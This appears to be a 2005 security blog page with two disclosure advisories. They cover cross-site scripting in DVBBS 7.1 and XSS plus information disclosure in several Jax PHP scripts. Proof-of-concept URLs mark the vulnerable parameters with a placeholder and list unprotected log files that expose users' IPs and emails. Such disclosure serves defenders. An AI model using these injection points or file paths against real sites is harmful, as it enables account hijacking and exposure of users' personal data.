DVBBS Multiple variable Cross site scripting

Monday, August 08, 2005
#############################################
DVBBS Multiple variable Cross site scripting
vendor url:http://down.dvbbs.net/
SoftView/SoftView_2455.html
Advisory:http://lostmon.blogspot.com/2005/08/
dvbbs-multiple-variable-cross-site.html
vendor notify:yes exploit available:yes
OSVDB ID:18512,18679,18680
Securitytracker: 1014632
BID:14498
Secunia: SA16131
#############################################

DVBBS contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity


############
solution
############

no solution available at this time !


############
versions
############

Dvbbs 7.1 Sp2
Dvbbs 7.1

#############
timeline
#############

discovered:21-jul-2005
disclosure:21-jul-2005
public disclosure:08-ago-2005

####################
proof of concept
####################


http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]

http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]

http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=

######################## €nd ##########################

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Jax PHP Scripts multiple vulnerabilities

Friday, August 05, 2005
############################################
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
OSVDB ID:18568,18569,18570,18571,18572,18573,18574,18575,18576,
18577,18578,18579,18580,18581,18582,18583,18584,18585,18586,
Secunia: SA16332,SA16333,SA16337,SA16338
BID: 14481
#############################################


###########
sumary:
###########

0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline

###############
0- Description
###############

Jax scripts is a collection of usefull php scripts to added or include in a web-site.

Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook

Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook

Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters
(Mailing List Manager)

Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)

Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)

Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates
(Template Editor)



###################
1-Products affected
###################

Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.

##################
2- Jax Guestbook
##################

Cross-Site Scripting and information disclosure:

http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]


http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]


http://[victim]/guestbook/guestbook
// clients ip who have post a firm in guestbook

http://[victim]/guestbook/guestbook_ips2block
//list of ips banned

http://[victim]/guestbook/ips2block
//list of ips banned

http://[victim]/guestbook/formmailer/logfile.csv
// ips ,from users send via formmail.php script.

################
versions
###############

Jax Guestbook v3.1
Jax Guestbook v3.31

###################
3- Jax Petitionbook
###################

Cross-Site Scripting and information disclosure:

http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]

http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0


http://[victim]/petitionbook/formmailer.log
// all ip , and message what all users sent via formmail


http://[victim]/petitionbook/ips2block
//all ips banned

http://[victim]/petitionbook/petitionbook
//all ips of people have signed the petition



#################
4- Jax Newsletter
#################

Cross-Site Scripting and information disclosure:

http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1

http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1

http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]

http://[victim]/newsletter/logs/jnl_records
// information disclosure form users ,direct request
to this file reveals:

"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.

############
versions
############

Jax Newsletter v2.14
Jax Newsletter v2.10

#################
5- Jax LinkLists
#################

Cross-Site Scripting and information disclosure:

http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]

http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]

http://[victim]/linklists/suggestions.csv
// direct request disclose ip of client who
have suggest a link.

#############
versions
#############

Jax LinkLists v1.1
Jax LinkLists v1.0


#################
6- Jax Calendar
#################

Cross-Site Scripting:

http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]



http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30

// all variables afected by XSS flaws



##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33


#################
7- Jax DWT Editor
#################

Cross-Site Scripting:

http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]


##############
versions
##############

Jax DWT Editor v1.0


###################
8- Timeline
###################

discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005

#################### €nd #############################

Thnx to estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...